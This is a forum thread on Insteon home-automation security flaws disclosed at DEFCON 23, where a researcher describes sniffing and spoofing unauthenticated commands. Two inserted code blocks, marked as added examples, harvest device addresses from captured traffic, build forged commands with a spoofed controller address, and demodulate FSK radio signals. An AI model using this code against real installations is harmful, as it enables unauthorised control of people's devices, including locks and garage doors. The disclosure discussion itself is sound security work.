
This could be bad...


ngeren


Posted (edited)

Apparently some major security flaws are about to be released regarding Insteon's protocol.

 

https://defcon.org/html/defcon-23/dc-23-speakers.html#Shipley

 

Yes, EVIL Pete indicated this in the Smarthome forum several weeks ago. I am eager to see what has been found and what methods are used to exploit the Insteon protocol.

 

Not too sure how Smartlabs will respond to this news . . .

 

But, if history is any measure or indicator, they (Smartlabs) will sit and wait for a year or so before they provide any kind of resolution. This was seen in the HUB v1 a few years ago and was documented on the Cisco site as to the threat level etc. For me, I am not worried at all about a hacker trying to control and access my Insteon network.

 

Given the extremely short distances of RF / power line signalling, the odds of someone outside in a vehicle lying in wait to capture the Insteon signal are highly remote. Bolster this with the sheer fact that I am surrounded by rednecks and low-tech fools, and that simply decreases the odds anyone is interested in hacking my lighting system.

 

Don't get me wrong: if EVIL Pete provides methods and techniques that compromise the Insteon architecture, Smartlabs needs to plug those holes etc.

 

For me I won't lose any sleep over this because there is a higher possibility of me getting struck by a meteor in this hick town than some random person coming down my street waiting to capture and turn on/off my lights. 

Edited by Teken
Posted

I've seen this boast a few times from various posters on various forums, "I will be presenting my research, and releasing tools demonstrating the vulnerabilities throughout the Insteon home automation system," but not yet any evidence of any presentation.

Posted

As Teken pointed out, it's going to be quite rare that someone would target a house that has an Insteon network. They'd have to be on my physical property in order to get a signal, which means I'd see them on my video surveillance. I don't have any red necks but I have a lot of old seniors with their oxygen tanks. I doubt they even have a cell phone (maybe a jitterbug), so that doesn't worry me.

 

I don't use Insteon for any security-related actions. I use a DSC alarm, all hardwired.

Posted

 

 

"For me I won't lose any sleep over this because there is a higher possibility of me getting struck by a meteor in this hick town than some random person coming down my street waiting to capture and turn on/off my lights. "

 

You say that now, but wait till a redneck makes your lights start strobing at 2am!

(YouTube-Hayseed Dixie)

 

 

GT

Posted

I've seen this boast a few times from various posters on various forums, "I will be presenting my research, and releasing tools demonstrating the vulnerabilities throughout the Insteon home automation system," but not yet any evidence of any presentation.

Thanks Stu. This kind of report is as tiresome as it is old. I understand the basis / model. I have been looking for a real exploit recreation or actual evidence of a breach to evaluate.

 

 

Sent from my iPhone using Tapatalk

Posted

Well, for perspective, I don't think anyone has the same skill set as EVIL Pete.

 

Considering this is what he does as a hobby and related work, and keeping in mind not one soul has ever been a presenter at DEFCON, this lends credence to what has been stated.

 

At the end of the day I don't believe he's just blowing smoke up your dress!

 

 

Ideals are peaceful - History is violent

Posted

Certainly not doubting anyone's skill, but what is presented here is 100% scare and 0% evidence.  If the work is so compelling, why not wait and publish with the evidence?  

 

So far, there is the potential to get people concerned about things that can't be seen or evaluated.

 

 

 

Posted (edited)

Certainly not doubting anyone's skill, but what is presented here is 100% scare and 0% evidence.  If the work is so compelling, why not wait and publish with the evidence?  

 

So far, there is the potential to get people concerned about things that can't be seen or evaluated.

 

 

True, but I saw it as informational data that he wanted to offer the general public. I don't pretend to know his underlying intent or purpose. But it's safe to say, given his past history, it's a combination of tinkering and finding exploits to help people and companies be aware and ultimately improve their products and security attributes.

 

I am more curious as to what hardware / software is being used to cause this exploit to be seen, as I have often seen people use things that the *average person* really had no capability to mimic or copy to do the same.

 

Case in point: ELA has made his ELAM, which assists him in monitoring every aspect of the Insteon protocol and line traffic along with signal strength. Given the fact his skills are very high and he is an EE, this does not come as a surprise to me in the least.

 

What does surprise me is Smartlabs' inability to offer the same.

 

You're talking about people who are intimately aware and have all the technical know-how of the Insteon protocol and more. Yet you have some random people like ELA & EVIL Pete who have summarily been able to obtain more and provide more data than any single Smartlabs engineer in the history of the product?

 

What is wrong with this picture???

Edited by Teken
Posted (edited)

I believe I've been pretty evangelical about NOT using Insteon for access control or life safety systems because I myself have been able to 'hack' my own system. All that's needed to take it to the next level is a SDR, listen for wireless Insteon signals, learn the addresses in a given installation and then start messing with link tables, turning devices on and off etc. No authentication at all.

 

I'm sure you've all noticed that you can add a wired device to the PLM link table without pressing any button on the device.... How do you think that works? By sniffing, it's easy to learn the PLM address and then send signals that 'appear' to be from the PLM to any device to control it.

 

Smarthome could have extreme liability for selling the IOLinc as a garage door solution.

 

Z-Wave does not have this issue because you must have physical access to the device.

Edited by MWareman
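The sniff-then-forge sequence described in the post above, as an added example that is not code from any poster or from Smartlabs. It works at the level of the PLM's documented serial frames (0x50 standard receive, 0x51 extended receive, 0x62 send) rather than the raw RF encoding, because the thread itself says the published RF documentation is not to be trusted. The capture bytes, the addresses 11.22.33 / AA.BB.CC / DD.EE.FF and the device roles are all constructed for the demo, and the "find the controller by counting who receives direct ACKs" heuristic is this example's own assumption.

```python
# Added example (not from the thread): parse Insteon traffic in PLM serial-frame
# format, harvest the addresses it exposes, and build a forged direct command.
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

START = 0x02
RX_STD = 0x50   # PLM "standard message received": from(3) to(3) flags cmd1 cmd2
RX_EXT = 0x51   # PLM "extended message received": standard fields + 14 user-data bytes
TX_STD = 0x62   # PLM "send Insteon message": to(3) flags cmd1 cmd2 [+14 bytes]
BODY_LEN = {RX_STD: 9, RX_EXT: 23}

DIRECT, DIRECT_ACK, DIRECT_NAK = 0, 1, 5   # message-type field, flags bits 7..5
EXTENDED_BIT = 0x10
CMD_ON, CMD_OFF, CMD_STATUS = 0x11, 0x13, 0x19


@dataclass
class InsteonMsg:
    src: bytes
    dst: bytes
    flags: int
    cmd1: int
    cmd2: int
    data: bytes = b""

    @property
    def msg_type(self) -> int:
        return (self.flags >> 5) & 0x7

    @property
    def extended(self) -> bool:
        return bool(self.flags & EXTENDED_BIT)


def addr(a: bytes) -> str:
    return ".".join(f"{b:02X}" for b in a)


def parse_frames(stream: bytes) -> List[InsteonMsg]:
    """Walk a byte stream of PLM-style frames, resynchronising on the 0x02 start byte
    and skipping frame types this tool does not decode."""
    msgs: List[InsteonMsg] = []
    i = 0
    while i + 1 < len(stream):
        if stream[i] != START:
            i += 1
            continue
        n = BODY_LEN.get(stream[i + 1])
        if n is None:            # unknown frame type: treat this 0x02 as noise
            i += 1
            continue
        body = stream[i + 2:i + 2 + n]
        if len(body) < n:        # truncated tail of the capture
            break
        msgs.append(InsteonMsg(bytes(body[0:3]), bytes(body[3:6]),
                               body[6], body[7], body[8], bytes(body[9:])))
        i += 2 + n
    return msgs


def harvest(msgs: List[InsteonMsg]) -> Dict[str, Set[str]]:
    """Every address seen and the roles it played. Only direct traffic carries a real
    device address in the 'to' field; group/broadcast messages carry a group number."""
    seen: Dict[str, Set[str]] = {}
    for m in msgs:
        seen.setdefault(addr(m.src), set()).add("src")
        if m.msg_type in (DIRECT, DIRECT_ACK, DIRECT_NAK):
            seen.setdefault(addr(m.dst), set()).add("dst")
    return seen


def guess_controller(msgs: List[InsteonMsg]) -> Optional[bytes]:
    """Assumption used here: devices ACK direct commands back to the sender, so the
    address that receives the most direct ACKs is the likely PLM / hub."""
    tally: Dict[bytes, int] = {}
    for m in msgs:
        if m.msg_type == DIRECT_ACK:
            tally[m.dst] = tally.get(m.dst, 0) + 1
    return max(tally, key=tally.get) if tally else None


def plm_send_frame(dst: bytes, cmd1: int, cmd2: int, max_hops: int = 3) -> bytes:
    """The 0x62 frame a real PLM accepts on its serial port. The PLM stamps its own
    address as the source, so this alone cannot impersonate another controller."""
    flags = (DIRECT << 5) | (max_hops << 2) | max_hops
    return bytes([START, TX_STD]) + dst + bytes([flags, cmd1, cmd2])


def forged_standard_message(src: bytes, dst: bytes, cmd1: int, cmd2: int, max_hops: int = 3) -> bytes:
    """The 9-byte logical standard message with a chosen (sniffed) source address.
    Putting this on the air needs a raw radio; the RF framing is not modelled here."""
    flags = (DIRECT << 5) | (max_hops << 2) | max_hops
    return src + dst + bytes([flags, cmd1, cmd2])


# Constructed sample capture (not real traffic): hub 11.22.33 turns AA.BB.CC on,
# AA.BB.CC ACKs, a stray byte, then DD.EE.FF sends an extended 0x2F (ALDB) message.
HUB, LAMP, KEYPAD = bytes.fromhex("112233"), bytes.fromhex("aabbcc"), bytes.fromhex("ddeeff")
SAMPLE_CAPTURE = (
    bytes([START, RX_STD]) + HUB + LAMP + bytes([0x0F, CMD_ON, 0xFF])
    + bytes([START, RX_STD]) + LAMP + HUB + bytes([0x2B, CMD_ON, 0xFF])
    + bytes([0x7F, START])                                   # line noise, stray start byte
    + bytes([START, RX_EXT]) + KEYPAD + HUB + bytes([0x1F, 0x2F, 0x00]) + bytes(14)
    + bytes([START, RX_STD]) + KEYPAD + HUB + bytes([0x25, 0x2F, 0x00])
    + bytes([START, RX_STD, 0xAA])                           # truncated frame at the end
)

if __name__ == "__main__":
    msgs = parse_frames(SAMPLE_CAPTURE)
    for m in msgs:
        print(f"{addr(m.src)} -> {addr(m.dst)} type={m.msg_type} ext={m.extended} "
              f"cmd={m.cmd1:02X}/{m.cmd2:02X}")
    print("addresses:", harvest(msgs))
    hub = guess_controller(msgs)
    print("likely controller:", addr(hub) if hub else None)
    print("forged ON for the lamp:", forged_standard_message(hub, LAMP, CMD_ON, 0xFF).hex())
```

The point the example makes is the one the post makes: nothing in the message is secret. Three bytes of source address, three of destination, a flags byte and two command bytes are all a device checks, so once a capture has yielded the controller's address, a forged "direct" frame is a matter of concatenating bytes.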
Posted (edited)

I believe I've been pretty evangelical about NOT using Insteon for access control or life safety systems because I myself have been able to 'hack' my own system. All that's needed to take it to the next level is a SDR, listen for wireless Insteon signals, learn the addresses in a given installation and then start messing with link tables, turning devices on and off etc. No authentication at all.

 

I'm sure you've all noticed that you can add a wired device to the PLM link table without pressing any button on the device.... How do you think that works? By sniffing, it's easy to learn the PLM address and then send signals that 'appear' to be from the PLM to any device to control it.

 

Smarthome could have extreme liability for selling the IOLinc as a garage door solution.

 

Z-Wave does not have this issue because you must have physical access to the device.

 

I think some of the fault lies with the general public, to be honest, and not all of the blame can land on Smartlabs. In this day and age all of us want to have our cake and eat it too. This often leads to a compromise in security or in the basic elements of the system.

 

Any person can walk into an office building and find best practices with respect to security not being followed, whether it be using strong passwords, not allowing recycling of similar ones, or expiring them on a known interval. Many places still do not use any kind of two-factor authentication or challenge-phrase passwords.

 

Many of the places I supported used all of the above and much more such as biometrics, random number generators used as a 3rd (in person) authentication etc. Some of the other military and bio medical facilities use face recognition, palm print, and retina detection for level 4 areas and beyond.

 

At the end of the day, if we all could accept the fact that the device had to be physically pressed to send out its MAC address, encrypted en route, there would be very little to worry about. But the reality is *we the people* have asked to make the enrollment easier and faster, so this is what we are left with.

 

Again, I see what EVIL Pete is doing as being for the benefit of the product, people, and the hardware. For ever and a day, those using Mac computers have believed they were impervious to exploits, viruses, trojans, etc.

 

Fast forward to the last five years: there are more each day that exploit the Mac OS. The reality is the Mac had a market share of less than 2% globally and nobody who was hacking at the time wanted to waste resources on something that had zero impact on the global marketplace.

 

Now, given the mass adoption rate and growth of the Apple product line in all manner of business, government, and public use, that 2% target has outpaced the PC industry by 300% YOY.

 

To a hacker there is now a reason, and ROI, for spending time to find and exploit known holes in the Unix / Linux kernel. For me, if EVIL Pete finds something that truly exploits the Insteon hardware, that is a good thing, as this will make future hardware that much better in the long run.

 

The biggest concern people should have is the slow aszz response time Smartlabs will have, let alone the wall of silence and the lack of a time line to correct said issue(s).

Edited by Teken
Posted

Like most here, I'm not too worried about anything worse than inconvenience from this, because I'm not relying on it for safety or security. But I expect companies who make IoT devices to have network security at the very top of their priorities list.

 

 

Sent from my iPad using Tapatalk

Posted

I'm sure Insteon's lawyers have already reached out to EVIL Pete in order to get a fix before this information goes public. Security concerns can be detrimental for a business and the consumers, so I wouldn't doubt that Insteon is doing everything possible to keep this from going public. Possibly why there is no proof of concept yet...

Posted (edited)

Thanks Stu. This kind of report is as tiresome as it is old. I understand the basis / model. I have been Looking for a real exploit recreate or actual evidence of a breach to evaluate.

 

 

Sent from my iPhone using Tapatalk

Why hack the Insteon signals when you can hack the ISY for a lot more fun? Imagine the cool programs you could set up for a joke!

 

Check the thumbnail pic.

http://forum.universal-devices.com/topic/12599-anonymous-hackedattacked-isy/?hl=hacked

Edited by larryllix
Posted

Sure. Expected for any device where it was too much trouble to change the admin/admin credentials as instructed.

 

 

Sent from my iPhone using Tapatalk

Guest Digger
Posted

It only takes one class action lawsuit to hurt a company.  If there is a vulnerability that can be exploited some lawyer will want to profit from it. 

 

Maybe this is a reason why there are no Insteon Locks. 

Posted

Maybe this is a reason why there are no Insteon Locks. 

 

There's an Insteon device that interfaces with MI locks.

Posted (edited)

I'll have the code up in a day or so now that I'm back from defcon.

 

Effectively Insteon's documentation for their RF protocol is bullshit and not even close to what is really used.

 

I've reverse engineered the actual protocol, documented it, and written a proof-of-concept set of tools.

 

These tools consist of a few programs & scripts to allow anyone to intercept and/or transmit commands, effectively circumventing Insteon's security model of needing to know the node address or being paired.

 

With a good antenna Insteon devices can be communicated with at a fair distance.

 

The security risk for the end user obviously depends on what you use Insteon for. If you have just lights, your threat profile is minimal.

 

I would not advise connecting locks or alarm systems, as Insteon is showing to be the weakest link in the chain.

Edited by evilpete
Posted

I'll have the code up in a day or so now that I'm back from defcon.

 

Effectively Insteon's documentation for their RF protocol is bullshit and not even close to what is really used.

 

I've reverse engineered the actual protocol, documented it, and written a proof-of-concept set of tools.

 

These tools consist of a few programs & scripts to allow anyone to intercept and/or transmit commands, effectively circumventing Insteon's security model of needing to know the node address or being paired.

 

With a good antenna Insteon devices can be communicated with at a fair distance.

 

EVIL Pete,

 

For the benefit of others, will you be able to offer a video presentation of this interception and control of the Insteon device via RF? Also, can you provide some clarity as to the overall intent and background as to why you took this project up besides novel curiosity?

 

I think many people who don't know you would appreciate some background and insight along with a little more detail as to what is happening exactly.

 

Lastly, have you been contacted by Smartlabs / Smarthome about these findings?

Posted

EVIL Pete,

 

For the benefit of others, will you be able to offer a video presentation of this interception and control of the Insteon device via RF? Also, can you provide some clarity as to the overall intent and background as to why you took this project up besides novel curiosity?

 

Defcon will be uploading the video in the next few weeks, it is not one of my better talks. I was not as animated as I would have liked.

 

I took on this project after trying to implement the RF protocol as documented in their "white paper" with a toolkit called rfcat and having it not work. In the process of debugging I discovered the gross inaccuracy of the published documentation.

Posted

Certainly not doubting anyone's skill, but what is presented here is 100% scare and 0% evidence.  If the work is so compelling, why not wait and publish with the evidence?  

 

So far, there is the potential to get people concerned about things that can't be seen or evaluated.

 

The reason the code was not pre-released was because while writing it I effectively beat it with a sledgehammer till it worked for me.

 

Given I have kids and a day job I have not had time to clean it up as much as I would like. I also wrote my own software FSK demodulator in the process as an exercise.

 

I'll be posting the code on my github account some time this week and I have plans to eventually make the tools more generic for use with other RF protocols.

 

Maybe someone will take what I've started and write a software based PLM...
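The post above mentions writing a software FSK demodulator as part of the work. The following is an added example, not EVIL Pete's code and not derived from the Insteon RF layer, of the pieces such a demodulator needs: a non-coherent two-tone detector, symbol-timing recovery off an alternating preamble, and a sync-word search that turns a bit stream back into bytes. The sample rate, baud rate, tone frequencies, preamble (0xAA 0xAA), sync word (0x2D 0xD4) and the 9-byte payload are all constructed for the demo and are not Insteon's real parameters; the script generates its own signal so it runs offline.

```python
# Added example (not EVIL Pete's code): a minimal software 2-FSK demodulator with
# symbol-timing recovery and sync-word search, exercised on a signal it generates itself.
import cmath
import math
import random
from typing import List

# Constructed PHY parameters (assumptions for the demo, not Insteon's real numbers)
FS = 48_000                        # sample rate, Hz
BAUD = 1_200                       # bits per second
SPB = FS // BAUD                   # samples per bit = 40
F_SPACE = 2_400.0                  # tone for a 0 bit (2 cycles per bit window)
F_MARK = 4_800.0                   # tone for a 1 bit (4 cycles per bit window)
PREAMBLE = bytes([0xAA, 0xAA])     # 0101... lets the receiver lock bit timing
SYNC = bytes([0x2D, 0xD4])         # constructed sync word marking start of payload


def to_bits(data: bytes) -> List[int]:
    return [(b >> (7 - k)) & 1 for b in data for k in range(8)]


def to_bytes(bits: List[int]) -> bytes:
    """Pack MSB-first; an incomplete trailing byte is dropped."""
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits) - 7, 8))


def modulate(bits: List[int], lead: int = 0, tail: int = 0,
             noise: float = 0.0, seed: int = 7) -> List[float]:
    """Continuous-phase 2-FSK at baseband, with optional silence and Gaussian noise."""
    rng = random.Random(seed)
    out = [rng.gauss(0.0, noise) for _ in range(lead)]
    phase = 0.0
    for b in bits:
        step = 2 * math.pi * (F_MARK if b else F_SPACE) / FS
        for _ in range(SPB):
            out.append(math.cos(phase) + rng.gauss(0.0, noise))
            phase += step
    out += [rng.gauss(0.0, noise) for _ in range(tail)]
    return out


def tone_energy(chunk: List[float], f: float) -> float:
    """Non-coherent detector: magnitude of a single-bin DFT at frequency f."""
    return abs(sum(s * cmath.exp(-2j * math.pi * f * n / FS) for n, s in enumerate(chunk)))


def bit_decision(chunk: List[float]) -> int:
    return 1 if tone_energy(chunk, F_MARK) > tone_energy(chunk, F_SPACE) else 0


def best_offset(samples: List[float], nbits: int = 16) -> int:
    """Symbol-timing recovery: try every start offset within one bit period and keep the
    one where the two tones separate most cleanly across the first nbits windows."""
    def score(off: int) -> float:
        total = 0.0
        for k in range(nbits):
            chunk = samples[off + k * SPB: off + (k + 1) * SPB]
            if len(chunk) < SPB:
                break
            total += abs(tone_energy(chunk, F_MARK) - tone_energy(chunk, F_SPACE))
        return total
    return max(range(SPB), key=score)


def demodulate(samples: List[float]) -> List[int]:
    off = best_offset(samples)
    return [bit_decision(samples[i:i + SPB]) for i in range(off, len(samples) - SPB + 1, SPB)]


def recover_payload(samples: List[float]) -> bytes:
    """Demodulate, locate the sync word, and return the complete bytes that follow it."""
    bits = demodulate(samples)
    sync = to_bits(SYNC)
    for i in range(len(bits) - len(sync) + 1):
        if bits[i:i + len(sync)] == sync:
            return to_bytes(bits[i + len(sync):])
    return b""


# Constructed payload: a 9-byte Insteon-style standard message (src, dst, flags, cmd1, cmd2)
PAYLOAD = bytes.fromhex("112233aabbcc0f11ff")
SIGNAL = modulate(to_bits(PREAMBLE + SYNC + PAYLOAD), lead=17, tail=50, noise=0.2)

if __name__ == "__main__":
    print("timing offset:", best_offset(SIGNAL))
    print("recovered:", recover_payload(SIGNAL).hex())
```

The tone spacing is chosen so that each tone completes a whole number of cycles per bit window, which makes the two single-bin correlations orthogonal and the decision clean; a real receiver for an unknown protocol has to discover the baud rate, deviation and sync word first, which is the reverse-engineering work the post describes.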

Posted

We all have different pressures on our lives, me too.

 

Good luck and I hope you accomplish your goals.

 

 

Sent from my iPhone using Tapatalk

Posted

The reason the code was not pre-released was because while writing it I effectively beat it with a sledgehammer till it worked for me.

 

Given I have kids and a day job I have not had time to clean it up as much as I would like. I also wrote my own software FSK demodulator in the process as an exercise.

 

I'll be posting the code on my github account some time this week and I have plans to eventually make the tools more generic for use with other RF protocols.

 

Maybe someone will take what I've started and write a software based PLM...

 

Well, this last statement just piqued my interest! One can only hope and pray this is something a developer could accomplish, but I don't see this ever coming to light in a commercial way.

 

It's one thing to do this as a private developer, doing this on the DL. But we all know Smartlabs would never allow this to happen or even come to market.

 

But let's just for a moment say some ingenious person was to *mistakenly* leak such a software PLM application which did not rely on actual hardware. The problem is how does one supply the power line / RF signaling to interact with Insteon hardware?

 

This would require a person obtaining the Insteon processing chip, which I have never heard of any 3rd party accomplishing save Broan, Smartinet, SkyLink, and Flood Stop.

 

I suppose anyone could just repurpose an existing chip from a unit and then go to town. Just spitballing here, so I'm curious how some of you feel this could be accomplished with as little investment / hardware as possible.

Posted

It can be done easily with the cc1111emk USB dongle.

 

I already have Python scripts that allow you to send commands in hex similar to the raw PLM interface.

 

Wrapping this as a network service making and presenting a PLM like interface over TCP would be straight forward.
